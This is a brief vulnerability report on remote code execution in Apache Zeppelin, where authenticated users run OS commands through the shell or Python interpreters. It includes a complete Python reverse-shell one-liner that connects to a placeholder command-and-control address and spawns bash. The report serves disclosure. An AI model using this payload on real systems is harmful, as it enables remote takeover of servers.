We have noticed that zeppelin is vulnerable to Remote code execution, where authenticated user will be able to execute arbitrary code on the server with help of Interpreter.
Case1: User can select the shell interpreter and execute the OS command directly and can get the reverse shell from there if needed.
Case2: User can select any other interrupter like python and get to execute the OS commands from there. For example we can get the reverse shell from the below code
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<c&c ip>",<port no>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'